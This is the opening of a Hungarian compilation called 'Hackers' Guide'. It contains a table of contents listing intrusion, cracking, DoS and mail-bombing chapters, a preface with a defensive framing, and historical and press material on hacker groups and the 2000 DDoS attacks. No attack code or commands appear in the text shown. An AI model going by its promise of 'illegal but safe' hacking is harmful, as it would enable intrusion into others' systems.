Hackers’ Guide by Phant0m
Volume #1
Hackers’ Guide
Tartalom: Volume #1 Előszó .......................................................................................................................... Történet ....................................................................................................................... Hacker-ek, cracker-ek, phreak-ek Billentyűs betolakodók Alternatív kultúra: Hackerek Hackerek A törés művészete Mi az igazság Kevin D. Mitnick, a CyberKalóz Hacker találkozó Hollandiában A hacker kiáltványa Hacker-etika Fontosabb időpontok az Internet fejlődésében Hálózattörténelem A Byte magazin 98/4 -es számában megjelent cikke Kezdés ......................................................................................................................... A Hacker és társai Első lépések… Ismertetô a hackelésrôl laikusoknak Kik a hackerek Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban Hogyan lesz az emberből Hacker Használjatok PGP-t A titkosításról A paranoiáról Hack Windows alól és tudnivalók Az IP szerzés módszerei Social Engineering (társadalommérnökség) Trashing or dumpster diving (kukabúvárkodás) Backdoors Mi is az a trojai program Pár szó a trojai programokról Snifferek Keyloggerekről általában Mi az IP, TCP/IP A WORLD WIDE WEB File Transfer Protocoll (FTP) GOPHER MI A TELNET Socks4 Protokoll Betörések felfedezése és kezelése I. Betörések felfedezése és kezelése II. Betörések felfedezése és kezelése III. Betörések felfedezése és kezelése IV. Betörések felfedezése és kezelése V.
2
Hackers’ Guide
Betörések felfedezése és kezelése VI. Anonimitás .................................................................................................................. Névtelenség ...avagy "Mindenki minket figyel!" Hogyan maradjunk ismeretlenek? Egyedi azonosító? Proxy I. Proxy II. Proxy Hunter leírás Password ..................................................................................................................... A jelszavakról általában A linux passwd file felépítése Jelszófeltörés Jelszavak törése Jelszótörés Passwd Re: Passwd PWL Hacking Tutorial Password fileok keresése Hogyan válasszunk rossz jelszót CuteFTP bizonytalan jelszótárolása BIOS Hátsóajtók BIOS jelszavak feltörése Denial of Service (DoS) .............................................................................................. Hogyan "lőjjünk" ki másokat a netről? És lőn sötétség a click után... A +++ath0 avagy a modemblitz NewTear DoS Tamadasok fajtai Internetto chat szivatás NUKING IS LAMEEE.... Win98 TCP/IP bug D.o.S-ra alkalmas bug a W'2000-ben Pirch'98 ident/fserve daemon DoS támadás War FTP DoS (MKD/CWD) Email ............................................................................................................................ Fake Email Hogyan küldjünk álcázott leveleket? (fakemail) Spoofed mail bombing by ReWtEr Levélbomba "Végtelenített" E-MAIL A legegyszerubb módszer levélbombázáshoz A Freemailrol ugy altalaban Szex kepek e-mailre Levélbomba törlése Outlook Express levelek Outlook Express 5 bug
3
Hackers’ Guide
WinPopup és NetSend üzenetek álcázása Volume #2 Linux ............................................................................................................................ Alap hack modszerek teoretikai oldala... Linux workstation törés Linux szerver törés Linux törés Egy lehetséges támadásra példa Backdoorokról gyakorlatban Unix Rendszerek Biztonsági Lyukai Root jog szerezése, ha alap felhasználo vagy Linux szerverek biztonsági kérdései Unix parancsok, amelyeket ismerned kell IP Chains kiegészítés Linux ipchains Firewall hiba Fakeuser Exploitok és a Telnet FTPCOVERSION bug Kernel bug WuFtpd trükk PING -R : kernel panic Hálozati Programozás C nyelven SAINT Windows ...................................................................................................................... Back Orifice NetBus 1.70 Leírás Trójai programok felderítése WIN95/98 alatt I. Trójai programok felderítése WIN95/98 alatt II. Trójai programok felderítése WIN95/98 alatt III. Szempontok Windows trojan készítéséhez Kevésbé ismert Windows'9x biztonsági lyukak Jelszó eltüntetése Windowsrol Registryben tárolt jelszavakról Windows ScreenSaver Jelszó NT Password Cracker Windows NT munkaállomás törése Windows NT szerver törése Windows NT bug Re: Windows NT bug Hogyan fagyasszunk Win-es gépet intraneten Windows nyomtatómegosztás - bug Hogyan szerezzünk IP-t OP jog nélkül IIS 4.0 Microsoft Server Remote Exploit NT támadás FrontPage bug Minden az UNICODE bug-ról Internet Explorer tartalmi tanácsadó kikapcsolása
4
Hackers’ Guide
Riched20.dll ActiveX I. ActiveX II. Novell ........................................................................................................................... Novell jelszavak a Windows alatt Novell LAN Hacking Novell érdekességek Novell Groupwise bug IRC, ICQ ....................................................................................................................... Két tűz mögött RFC-1459 A mi mIRC-ünk... I. rész: Popups A mi mIRC-ünk... II. rész: Aliases A mi mIRC-ünk... III. rész: Remote A mi mIRC-ünk... IV. rész: Sockets A mi mIRC-ünk... V. rész: Dialogs A mi mIRC-ünk... VI. rész: Ami az eddigiekbôl kimaradt... Az IRC-harc alapjairól IRC Hacking Tutorial A null csatorna A #2,000 bug User klónozás Fake OP Fakedrop Flood mIRC flood védelem mIRC jelszó kikapcsolása mIRC 5.4 Kill mIRCkill patch Hogyan juss be egy csatira vagy szerverre, ha bannoltak? Az "eredeti név"-ben vezérlôjelek használata Az Eggdrop IRC bot Eggdrop 1.3.26 bug CTCP trükk DCC gyorsítás Hogyan tevékenykedj (írj, csatlakozz csatira, stb.) más nevében? Hogyan rejtsem el az IP címemet IRC-n? WAC - WoRsITE A CoToCoP Advanced On-JOIN scanner Miért ne irceljünk root-ként Hogyan pusztítsunk IRC-n vagy ICQ-n ICQ exploit - avagy hogyan klonozzunk ICQ-ban ICQ Re: ICQ99 jelszavak CTCP-FAQ Web .............................................................................................................................. A site feltörés
5
Hackers’ Guide
Web-Hack F.A.Q. Félhivatalos Web-Hack FAQ A PHF MODSZER Hogy kell Unix ACCot szerezni 24 oraval ezen dokumentum olvasasa utan ?? Mi a .cgi .cgi Egyszeruen A test-cgi sebezhetősége bizonyos beállításoknál Néhány CGI bug csak röviden Két .cgi exploit "Vadász Gábor OnLine" jelszavak Jelszóvédett weblapok feltörése Webes levelbomba kuldes [ fLip! ] Altavista.Com ...avagy a hackerek legjobb buntársa Webterminál hackelések Extra hack Re: Extra hack Hogyan hackeljük meg az Extra.Hu-t Emil.alarmix.org hack A /wwwadmin.pl Exploitról Account Manager Password Exploit (amadmin.pl) Apexec.pl Bug Campas exploit Carbo.dll exploit Exploit a Microsoft IIS-hez HTML kód, ami leöli az IE 5-öt MailMachine.cgi bug QuikStore Shopping Cart Script bug Sambar Server bug Sambar Server search CGI bug Subscribe Me Exploit (subscribe.pl) Unstorekeeper.pl Bug .asp fájlok forráskódjának megtekintése Phreak ......................................................................................................................... Kálváriám a Matávval: avagy ügyintézés RULEZ!!!! A 909 használata Mi az a wardialer Wardialer 1.31 by MMan THC-Scan használat + config Híváskorlátozásfeltörő 0.01 by Mman Ophacker 0.1 by MMan "06-80"-on keresztül külföldre A pénzbedobós telefonok hackolása Amerikában és Angliában Mobildolgok SMS Flood www.777sms.hu-n keresztül Szivatás mobiltelefonon keresztül Egy Matávos levele Volume #3
6
Hackers’ Guide
Egyéb ........................................................................................................................... Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs? Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ? OpenBSD felhasználói útmutató Különböző trójai programfajták leírása me$$iah trojai program RSC's Offline Server Emulator AMaViS root exploit CD-k másolásvédelmének megszüntetése amstel.interware.hu feltörése Nyugatmagyarországi Egyetem feltörése Országos Széchenyi Könyvtár feltörése
Függelék ...................................................................................................................... Internet kisszótár Linux Kisszótár IRC szótár Phreak szótár Szabványos portok listája Nemzetközi domain-ek A legismertebb trojai programok és portjaik I. A legismertebb trojai programok és portjaik II. BUHERÁTOR TESZT 1.1 BugTraq lista részletek... Hasznos URL-ek gyüjteménye a számítógépes biztonság területén
Előszó < !!! A HACKELÉST A TÖTVÉNY SZIGORÚAN BŰNTETI !!! > Akkor miért van ez a könyv? Azért, hogy fegyvert adjunk unatkozó gyerekeknek a kezébe? Tippeket adjunk hogyan törjenek be szerverekbe? Hogyan küldjenek levélbombát? Hogyan törjenek fel weblapokat? Korántsem! Azért van ez a könyv, hogy a naív és gyanútlan felhasználó és az elbizakodott rendszergazda megismerje azokat a technikákat, trükköket amivel többé-kevésbé könnyen be lehet jutni szerverekbe, hálózatokba. Hogy rámutassunk a redszerek gyenge pontjaira. Hogy igenis szükség van egy bizonyos „paranoiára” mert lehet, hogy holnap a Te gépedbe törnek be. Hogyan akarsz védekezni, ha nem tudod hogyan támadnak?
7
Hackers’ Guide
Ez a könyv az Interneten fellelhető magyar nyelvű hacker dokumentumok és írások összessége mindennemű tartalmi változtatás nélkül. Ahol megvolt, ott fel van tüntetve a szerző is. E könyv tartalma állandóan változik, bővül ahogy változnak a hackelés technikái is. by Phant0m
************************************************************************************************
Történet
Hacker-ek, cracker-ek, phreak-ek
Az Egyesült Államokban és Nyugat-Európában 15-25 éves fiatalokból WEB-szerte ismert csoportok szervezodnek. A Legion of Doom (LoD), Masters of Deception (MoD), Cult of the Dead Cow (cDc), vagy a holland Hack-tic csak néhány, a legismertebbek közül. Tagjaik, különbözo dologra szakosodtak. A phreakek a telefonközpontok vezérloszámítógépeinek, a távközlési vonalak ingyenes igénybevételének és általában a telekommunikációnak a szakértoi. Rendelkeznek a központok átprogramozásához szükséges tudással, illetve megfelelo eszközökkel a mobil telefon hálózat forgalmának, belso adatainak lehallgatásához. Késobb ok maguk, vagy akiknek az információkat továbbadták mások költségére telefonálnak. A 95-ös adatok szerint, az összesített kár több mint 4 milliárd USD. (Forrás: NCSA) A crackerek különbözo operációs rendszerekre és platformokra specializálódtak. Próbálgatnak, kisérleteznek amig valami "használhatóra" nem bukkannak. Elso lépésben a cél interaktív kapcsolat (login) megszerzése, ami kemény munkával továbbfejlesztheto root avagy superuser jogkörré, aki egy-egy gép legfobb adminisztrátora. A kis közöségeket az érdeklodés nagyobb közösségekké formálja, mert a tudás, tapasztalat így sokkal jobban átadható. Az ezirányú kutatással és információgyujtéssel is foglalkozó NCSA (National Computer Security Association) például csak az USA-ban egy olyan, több mint 400 BBS-bol álló hálózatot tart nyilván, amelyet ilyen közösségek tartanak fenn, szigorúan "belso" használatra - a telefontársaságok költségére. A tagok között munkamegosztás van. Egyesek felderítéssel foglalkoznak. Kukákban turkálnak, vállalatok papírhulladékai között keresgélnek, hátha login nevekre, jelszavakra bukkannak. Mások un. "WAR dialer"-t muködtetnek, ami éjszakánként több ezer számot is végigtárcsáz, hátha modemre bukkan a túlsó végen. A talált számok listája mint potenciális célpont felkerül a BBS hálózatra, hogy a többiek "hasznosítsák". Mások a postai hálózatok muködését tanulmányozzák, és pontos muszaki leírásokat adnak, hogyan lehet mindenféle "színes doboz"-t készíteni (blue box, red box ...stb.) a telefontársaságok kijátszására. 8
Hackers’ Guide
A blue box például a telefonközpontok közötti 2600 Hz-es un. in-band jelzéseket felhasználva ingyenes távhívásra "jogosít". Minden információt közzétesznek, megjelentetnek BBS-en, WWW szervereken, az általuk (is) látogatott NEWS groupok listáin, (ilyen pl. az alt. 2600 - a név a Blue box muködési frekvenciájából származik) és idoszakos kiadványokban. ( 2600 Magazine, Phreaker, Hacker.FAQ ). Az Interneten bárki szabadon hozzájuthat hacker tool-okhoz (pl. jelszó feltöro programokhoz) és a használatukhoz szükséges tudáshoz. Több-kevesebb rendszerességgel konferenciákat is szerveznek (DefCon, HoHoCon, H.O.P.E.-Hackers on Planeth Earth), ahol végre személyesen is talkálkozhatnak. Tapasztalatokat cserélnek, meghívott profiktól (ügyvédek, volt rendörök) eloadásokat hallgatnak jogaikról, védekezési lehetoségeikrol (letartóztatás-elkerülési technikák) és a rendorségi akciókról. Saját pólót nyomtatnak az esemény alkalmából. Jellegzetes pólófeliratok az alábbiak: "Root is a state of mind". Root-nak lenni (a UNIX-os gépek korlátlan hatalmú adminisztrátora) egy szellemi állapot. Vagy: "Why? Because We Can!" Hogy miért tesszük? Mert képesek vagyunk rá! Azt állítják (minden bizonnyal joggal), hogy ok csupán összegyujtik, rendezik és úgy publikálják a legtöbbször amúgy is nyilvános információkat. Szabad információáramlást kibertérben! Ez filozófiájuk egyik alapköve. Minden tevékenységük ezt szolgálja - legalábbis elvben. A másik alapko az érdeklodés. Az lehet igazi hacker akit a tudás magáért a tudásért érdekel. Az anyagi elonyökért elkövetett betörések elég ritkák. A motiváció inkább a hiúság, csínyben való részvétel, hírnév. Nemegy esetben sztárt csinált a börtönviselt crackerbol az amerikai média. A bunüldözo szervek (FBI, Secret Service High-tech Crime Division) természetesen tudnak a konferenciákról, és képviseltetik is magukat, amire a résztvevok a "Spot the FEDs" (szúrd ki az ügynököt) vetélkedovel válaszolnak. Ez már hagyomány. Komolyabb rendorségi akciókra csak akkor kerül sor, ha mondjuk kiderül, hogy valaki törölte a hotel számítógépébol a vendéglistát. Ezen persze amúgy is csak fantázianevek fordulnak elo.: Eric Blodaxe (LoD), Deth Vegetable (cDc), Optic (MoD) estleg Corrupt. Az itt egymásnak elmesélt történetek között a mulatságostól az ijesztoig minden található. Musoron vannak az osellenség a "hárombetus" kormányügynökségek gépeire való sikeres betörések. Az ügynökségek ezek létét tagadják. Hitelesen cáfolni nehéz, bizonyítani veszélyes. Biztosan megesett viszont, hogy a NASA egyik központjának klímaberendezését vezérlo számítógépbe sikerült modemes kapcsolaton behatolni. A többit az olvasók fantáziájára bízom... A témával foglalkozó ujságírók sincsenek biztonságban. 1994-ben a Slatalla-Quittner szerzopáros hosszabb cikket jelentetett meg a MoD és az LoD közötti egyik nézeteltérésrol egy amerikai lapban, "Gang War in Cyberspace" címmel. A "fiúk" zokon vették a dolgot. Eloször is átprogramozták a vevoket kiszolgáló telefonközpontot, mintha az elofizeto azt kérné (természetesen saját költségére), hogy a bejövo hívások egy másik (távolsági hívással elérheto) helyen csöngjenek ki. Ott (nem túl illedelmes bevezeto után) egy üzenetrögzíto fogadta a hívást. A szerzok döbbenetére se fonökeiknek se rokonaiknak nem tunt fel a dolog, szépen üzenetet hagytak. A bosszú folytatásaként két kisebb Internet szolgáltató (elozoleg feltört) gépérol levélbombázást indítottak a szerzok Internetre kapcsolt gépe ellen, úgyhogy azt ideiglenesen le kellett állítani.
9
Hackers’ Guide
A példák sora hosszan, hosszan folytatható. Az egész jelenséget két dolog teszi igazán ijesztové a kívülálló számára. Nem tudható, ki a következo célpont, és nem tudható, hogyan lehet védekezni a következo támadás ellen. A betörok nem ott törnek be ahol akarnak, de hogy hol, azt sem a biztonsági rendszereket tervezo szakértok, de talán maguk a betörok sem tudják elore megmondani. Az elony a betörok oldalán van. Nekik korlátlan idejük van, míg a védelem költségvetése mindig véges. Az egyik számítógépes biztonságról szóló könyvben az alábbiak olvashatók: "Ha mély benyomást akarsz tenni egy biztonsági szakértore, mondd azt, hogy az elmúlt 5 évben csak egyszer törtek be a rendszeredbe. Ha ugyanis azt mondod, hogy egyszer sem, akkor azt fogja hinni, még arra is képtelen vagy, hogy észleld a betöréseket." Hogyan lehet védekezni? Az amerikai hatóságok '91-ben az egész USA-ra kiterjedo hajtóvadászatot indítottak aminek 14 letartóztatás majd 4 személy börtönbüntetése lett az eredménye. Az események hu krónikája a WEB-en is olvasható, könyv formában kiadott "Hackers Crackdown". A hatóságok akciói, és egyáltalán a kérdéskör jogi kezelése (nem beszélve arról, hogy a jog, mint mindig, messze elmarad a technika mögött) POST MORTEM, vagyis a kárvallottakon már nem sokat segít. Az Elektronikus Határvidéken - akárcsak egykor a vadnyugaton - mindenki a maga igazát védi, ahogyan tudja. Néha igencsak vadregényes módszerekkel. A már említett NCSA pl. un. Tiger Team-et tart fenn, melynek feladata, hogy a megbízó cégek hálózataiba bármilyen hacker módszerrel betörjön, így kimutatva a védelem gyenge pontjait. A hatékonyabb munka érdekében a MasterCard támogatásával beépültek Cracker közöségbe. Érvényes, áldozatnak szánt hitelkártya számokat közöltek a crackerekkel, cserébe hozzáférést nyertek a már említett, több mint 400 gépes BBS hálózat anyagához. Ezt az NCSA éjszakánként gondosan végigindexeli, hogy könnyebb legyen téma szerint keresni a védelmi rendszerek tervezésekor. WWW szerverükön a társaság tagjai rengeteg hasznos információt találhatnak. Coverrid
************************************************************************************************
Billentyűs betolakodók Internetes bűnözés Előbb a Yahoo!, aztán az EBay. A világháló sebezhetősége komoly veszélyt jelent az elektronikus kereskedelemre - és mindannyiunkra. Bekövetkezett az, amire számítógépes biztonsági szakértők még gondolni sem mertek: egymás után, dominóként dőltek össze a világháló legnagyobb elektronikus kereskedelmi fórumai. A Yahoo!-val kezdődött. Február 6-án az óriásportál három
10
Hackers’ Guide
órára leállt. A következő napon - mindössze órákkal tőzsdei bevezetése után - a kiskereskedelemben utazó Buy.com társaságot érte utol a végzet. Aztán este sor került az eBay, az Amazon.com és a CNN honlapjaira is. A következő reggelen a káosz tovább gyűrűzött az E*Trade online brókercég és mások felé: internetes lapjaik forgalma gyakorlatilag megbénult. Mindez talán egyetlen szuper-hacker műve volt? Az ügyet vizsgáló nyomozók egyelőre nem tudják - vagy nem árulják el. De a szakembereket a felelős személy vagy csoport kiléténél jobban aggasztja, milyen könnyedséggel hangolták össze és vezényelték le a támadássorozatot. Minden jel arra utal, hogy valaki otthona melegében üldögélve, néhány billentyű lenyomásával súlyos zavart kelthet az egész világ elektronikus kereskedelemben. SAKK ÉS MATT A szakemberek szerint az egész annyira egyszerű, hogy az már ijesztő: a pusztítást végző szoftver használata könnyű, a világháló számtalan underground hacker oldaláról gond nélkül letölthető. A rövidke programot azután számítógépek garmadájára csempészik fel a világ minden pontján.. Aztán csak egy gombnyomás és az összes ilyen PC akcióba lép: újra és újra egy egyszerű információkérést küldenek a kiszemelt honlapnak - másodpercenként több százszor. Hiába minden bonyolult tűzfal, behatolást érzékelő rendszer, titkosítás és biztonsági előírás, az elektronikus boltok egy-kettőre áldozatául esnek ennek a viszonylag egyszerű eljárásnak. Olyan ez,mint amikor többen egyszerre tárcsázzák ugyanazt a telefonszámot, s mindannyian foglalt jelzést hallanak. "Ilyen nagyságrendben ilyesmit eddig még nem tapasztaltunk, nemcsak az EBay-nél, de máshol sem" - állítja Margaret C. Whitman, a társaság vezérigazgatója. A támadók sem a website-ot nem törték fel, sem adatokat nem tettek tönkre, sem hitelkártyaszámokat nem loptak - legalábbis ez idáig. Ám ezzel a pokolian egyszerű trükkel mégis sikerült átmenetileg megbénítani a kereskedelmet a világháló legnagyobbjai közé tartozó több portálon, nekünk szegezve a kérdést: Mennyire sebezhető az internet? Veszélyeztethetik az ehhez hasonló akciók az idén várhatóan 450 milliárd dollár kereskedelmi forgalmat lebonyolító világháló robbanásszerű növekedését? "Odakint már egy ideje háború folyik, legfeljebb eddig rejtve maradt" mondja James Adams, a cyber-fenyegetésekre specializálódott Virginia állambeli iDEFENSE egyik alapítója. "Most ébredtek rá széles körben az emberek a háló sebezhetőségére, és arra, hogy mibe is keveredtünk, amikor gondolkodás nélkül beneveztünk az információs szupersztráda gyorsasági versenyébe." Persze még a legdörzsöltebb "cyberkopók" sem állítják, hogy a net egyik napról a másikra hervadásnak indulna az ilyen kalózakciók miatt. De az elmúlt napok eseményei után a napnál is világosabb: az internetes vállalatoknak legalább annyi gondot kell fordítaniuk honlapjaik és hálózataik védelmére, mint arra, hogy azokat összekössék vásárlóikkal, beszállítóikkal - és velünk. Emléketetőül csak a közelmúlt történéseinek hevenyészett listája: - Decemberben 300 ezer hitelkártyaszámot loptak el az online zenekereskedést folytató CD Universe-től. - Márciusban az elektronikus levelező rendszereken végigsöprő, s azokat
11
Hackers’ Guide
világszerte megbénító Melissa vírus mintegy 80 millió dolláros kárt okozott. - Ugyanabban a hónapban a felbérelt hackerek beismerték, hogy feltörték az AT&T, a GTE és a Sprint távközlési óriások rendszereit, többek között olyan hívókártya számokért, amelyek végül olasz szervezett bűnbandák kezébe kerültek. Az FBI a telefontársaságoknak okozott kárt 2 millió dollárra becsülte. A szélessávú Internet-kapcsolatok mindennapossá válásával még súlyosabbá válhat helyzet. Egyre többen vannak, akik a világhálót többé nem alkalmanként, tárcsázással érik el a világhálót, hanem a telefonhoz hasonlóan állandó kapcsolatban lesznek a hálózattal. Meglehet, ez zene az elektronikus kereskedők füleinek, viszont a vásárlókra valódi veszélyt az jelenthet, ha a cybercsalók úgy járhatnak ki-be számítógépes rendszerünkben, ahogy kedvük tartja. "Addig kopogtatnak, míg nyitott ajtót nem találnak." - mondja Bruce Schneyder biztonságtechnikai szakértő. A legnagyobb fenyegetés - bármilyen elkeserítő is - belülről jön. A nyomozó hatóságok becslései szerint a betörések mintegy 60 százalékát belső alkalmazottak követik el. A számítógépes hálózatok könnyen hozzáférhető belépési pontok a bosszúszomjas alkalmazottak, kémek, tolvajok, "szociopaták" és unatkozó tinédzserek számára. Ha már egyszer bejutottak a vállalat belső hálózatába, szabadon garázdálkodhatnak az ott található szellemi tulajdonnal vagy adatokkal, munkafolyamatokat akadályozhatnak, vagy akár teljesen tönkretehetnek egy adott üzletet vagy karriert. "Ez én felfogásom szerint minden internetes tranzakció potenciális célpont" - vallja Paul Field, a számítógépes kalózból lett biztonsági tanácsadó. Egy kis felfordulást szeretne kelteni? Biztonsági szakértők szerint mintegy 1900 website-ról tölthetőek le - ingyen - azok a digitális eszközök, amelyek segítségével bárki szimatolhat mások gépén, azt lefagyaszthatja, átveheti felette az irányítást, vagy megszerezheti minden egyes billentyűleütés másolatát. Steve O'Brien, az illetéktelen behatolások felderítésével és biztonsági megoldásokkal foglalkozó, marylandi székhelyű cég, az Info-Ops.com információs műveletekért felelős alelnöke szerint a számítógépek feltörésének módozatai napról napra fejlődnek. A növekvő veszélyért O'Brien nemcsak a hacker-csoportokat, de a programok megállíthatatlan terjedését is okolja. Ami egykor ritkaságnak számított - ma naponta legalább három új rosszindulatú szoftvert vagy sebezhető programpontot fedeznek fel.
Billentyűs betolakodók 2 Kitárt kapuk Mindez széles támadási felületet biztosít a hackereknek. Egy hagyományos telefonos modemmel összekötött személyi számítógép a felhasználó minden egyes hálóra kapcsolódásakor új internetes (IP) címet kap. Ez komoly gát az adott gépet az eBay-t, a Yahoo!-t és másokat ért támadáshoz hasonló eszközökkel feltörni és "eltéríteni" igyekvő kalózok előtt. Ezzel ellentétben a kábeles és digitális előfizetői vonalak igen csábítóak a hackerek számára, mivel ezek a gépek folyamatos 12
Hackers’ Guide
kapcsolatban vannak a világhálóval, s általában fix, az e-mailekből és a hírfórumokra küldött levelekből könnyen kiolvasható címmel rendelkeznek. A gépeket megvédeni képes "tűzfal" néven ismert biztonsági rendszerek minden otthoni kábeles és digitális előfizető számára is elérhetőek. De amíg ezek használata nem közelíti meg a 100 százalékot, nem akadályozhatják meg a betöréseket. Az információs háztartási eszközök korának felvirradtával a helyzet tovább romolhat. Számos elemző szerint az Egyesült Államokat már a közeljövőben eláraszthatják a webböngészős televíziók, a hálózatos játékvezérlők, az intelligens hűtőszekrények és a hálóról programokat letöltő webtelefonok. Ezekben az eszközökben erős, az internettel kapcsolatban álló processzorok dolgoznak, amelyeket egy támadás során ki lehet használni. Nem mintha a szélessávú internet felhasználói nem kapcsolódhatnának le a világhálóról. De ahogy egyre több izgalmas lehetőség tárul fel, senkinek sem lesz már ehhez kedve. Folyamatos zene- és videoszolgáltatás, napi 24 órás hírszolgálat és a szélessávú webes integráció sok más fajtája jelenik majd meg. Hogy kihasználják ezek előnyeit, az emberek éjjel-nappal nyitva tartják majd az "ajtókat". Semmivel sem rózsásabb a helyzet a vállalatoknál. A rendszerbiztonság náluk jó úton tart afelé, hogy alapvető és drága szükségletté váljon. Az amerikai vállalati szféra tavaly 4,4 milliárd dollárt költött internetes biztonsági programokra, így "tűzfalakra", behatolásjelző szoftverekre, digitális tanúsítványokra, valamint hitelesítő és engedélyeztető programokra. E kiadások 2003-ra elérhetik a 8,3 milliárd dollárt. TERJEDŐBEN A számítógépes bűnözés mégis terjed. Az FBI és a Computer Security Institute 520 vállalatot és intézetet felölelő felmérése során a válaszadók több mint 66 százaléka számolt be számítógépes hálózata illetéktelen használatáról a kérdezést megelőző 12 hónap során. 1997-ben ez még csak 50 százalék volt. És a behatolásoknak immár 57 százaléka volt összefüggésbe hozható az internettel, a két évvel korábbi 45 százalékkal szemben. Bármilyen nagynak is tűnnek ezek a számok, igazából senki sem tudja, hogy menynyire elterjedt az internetes bűnözés. A legtöbb támadás - biztonsági szakértők szerint akár 60 százalékuk is - észrevétlen marad. Ám még az észlelt támadásoknak is csupán legfeljebb 15 százalékát jelentik a bűnüldöző hatóságoknak. A vállalatok kerülik a nyilvánosságot. Amikor az orosz alvilág hackerek segítségével betört a Citibankba és onnan leemelt 10 millió dollárt - csak 400 ezret sikerült belőle visszaszerezni - a konkurencia a hírt reklámkampányaiban a bank ellen fordította. Ez tovább nehezíti a hatóságok munkáját. Az elektronikus támadást elszenvedő vállalatok túlnyomó része nem nyilatkozik a sajtónak. Leginkább vevőik bizalmának elvesztésétől és imidzsük sérülésétől tartanak - nem beszélve a támadást majmoló hackerektől való félelemről. A február 8-i és 9-i támadásokat követően az általában bőbeszédű internetes cégvezetők, az E*Trade-től a Priceline.com-ig, árulkodó hallgatásba burkolóztak. Azok, akiket még nem ért támadás, vonakodtak megszólalni, nehogy ezzel hívják fel site-jukra a figyelmet. A többieknek pedig már elegük volt a nyilvánosságból. 13
Hackers’ Guide
HONLAPELTÉRÍTÉS A bűnüldözők egyik problémája, hogy a hackerek látszólag mindenütt jelen vannak. Előfordul, hogy úgynevezett számítógépes biztonsági cégeknél dolgoznak. Egyre gyakoribbak a külföldről, különösen a Kelet-Európából induló támadások. A probléma súlyosságát jelzi, hogy az America Online 1996-ban a saját biztonsága érdekében inkább megszakította összeköttetését Oroszországgal. És ha a kalózok miatti aggódás nem volna elég, az online csalások száma is emelkedőben van. A fogyasztók által bejelentett, hamis meggazdagodási lehetőségekkel kecsegtető tervekkel vagy soha meg nem érkezett aukciós tárgyakkal kapcsolatos panaszokkal foglalkozó kereskedelmi hatóság, a Federal Trade Commission (FTC) tavaly 61 pert indított (1994-ig viszont, amikor a háló még gyerekcipőben járt, mindössze egyet). Ez idáig a bírósági eljárások több mint 20 millió dollár fogyasztói kár megtérítését rótták ki, és éves szinten - becslések szerint - 250 millió dollárt meghaladó csalási tevékenységet számoltak fel. De az FTC nem elégszik meg ennyivel: képviselői februárban szenátusi meghallgatáson vettek részt, ahol a testület költségvetésének növelését szorgalmazták, hogy új internetes stratégiákat dolgozhassanak ki, valamint hogy felvehessék a harcot a cybercsalásokkal szemben. A pénz ahhoz kell, hogy az egyre találékonyabb rendszerek nyomába eredhessenek. Szeptemberben például az FTC olyan portugál és ausztrál személyek ellen indított pert, akik "honlapeltérítést" és "egérrablást" követtek el, amikor amerikai székhelyű website-okat engedély nélkül lemásoltak, s azokhoz megtévesztésig hasonló lapokat regisztráltattak a nagyobb internetes keresőkön. A vádlottak a mit sem sejtő vevőket a honlapokról pornó siteok láncolatához vezették, s azokból a laikus fogyasztók ki sem tudtak lépni. Az FTC elérte, hogy a bíróság határozatban parancsoljon megálljt a csalásnak, felfüggesztve az alperesek website regisztrációit. A felügyelő hatóságok szerint a cyberbűnözés virágzásának egyik fő oka az, hogy az emberek sokkal jobban bíznak az internetben, mint amennyire azt ez a rendszer kiérdemli. "Sok hasznos információhoz juthat az ember a hálón, de annak, amit ott tesz, 95 százaléka puszta jóhiszeműségen alapul" - mondja G. Philip Rutledge a pennsylvaniai értékpapír-felügyelet helyettes főtanácsadója. "Ez sajnos utat nyit a csalások előtt." Ha a cyberbűnözésnek gátat akarunk szabni, nincs más választás: a biztonságtechnológiának kell az internet következő húzóágazatává válnia. IRA SAGER, STEVE HAMM ÉS NEIL GROSS, NEW YORK JOHN CAREY, WASHINGTON-ROBERT D. HOF, SAN MATEO (c) Business Week - H3XR00T http://hexnet.hpage. net/
2000.03.0 7.
************************************************************************************************
14
Hackers’ Guide
Alternatív kultúra: Hackerek forrás: http://www.internetto.hu/internetto/zene/altcult/ hackerek A Zen-tanítványok megfeleloi a számítógépes világban: matematikai muveleteket képesek fejben elvégezni tizenhatjegyu számokkal, és napokig elvannak néhány doboz Jolt üdíton meg pár zacskó chipsen. Bár maguk a hackerek szóba se állnak a crackerekkel, vagyis azokkal, akik szokatlan képességeiket számítógépes rendszerek szétrombolására használják, a tömegtájékoztatás általában nem tesz különbséget a két csoport között. Sot, a gonoszokat nevezi ki a hacker-mitológia fohoseinek, például a Phone Phreaks Kevin Mitnick-et, vagy a New York-i Masters of Deception csoportot (ld. még: Phiber Optik). Pedig az igazi hackerek csak a saját etikájuknak engedelmeskednek, ami úgy szól, hogy az információ szabadságra vágyik. Néhányan közülük, például Bill Gates, milliomosok lettek. (ld. még: Free Software Foundation, 2600)
phone phreaks - telefonorültek Azok, akik abban lelik örömüket, hogy telefonrendszereket ismernek ki, hogy manipulálhassák. Elso példányaik a 60-as években bukkantak fel, jóval a komputerek és a crackerek (ld. hackerek) elott. A mufaj egyik legendás alakja, bizonyos Captain Crunch egy játékdobozzal képes volt 2600 Hertzes fütyülo hangot eloállítani, azt, amelyik a régi típusú telefonrendszereket irányította. A hang emlékét a 2600 magazin címe ma is orzi.
2600 Telefonorült (lásd phone phreaks) és számítógép-hacker olvasóknak szánt, negyedévente megjeleno fanzine: címe arra a frekvenciára utal, amelyet egy idoben a telefontársaságok szereloi használtak, hogy bejuthassanak vele a telefonvonalakra. Foszerkesztoje, Eric Corley Emmanuel Goldstein néven (George Orwell 1984 címu regényének mítikus ellenzéki figurája) adja ki a lapot, amely egyébként 1984-ben indult. Cikkei részint tanácsokat adnak telefon- és számítógéphálózatok elleni akciókhoz, másrészt kiáltványok az információszolgáltatásban muködo nagyvállalatok és az oket pártoló törvények ellen. Corley, ahol csak teheti, kiáll a hackerek mellett: még a Kongresszus egyik meghallgatásán is felszólalt, ahol kifejtette, hogy a hackerek nem a profit reményében, hanem a szellemi szabadság határainak kitágításáért követik el, amit elkövetnek, szemben a fehérgalléros - vagyis értelmiségi bq.nözôkkel és a külföldi kémekkel.
15
Hackers’ Guide
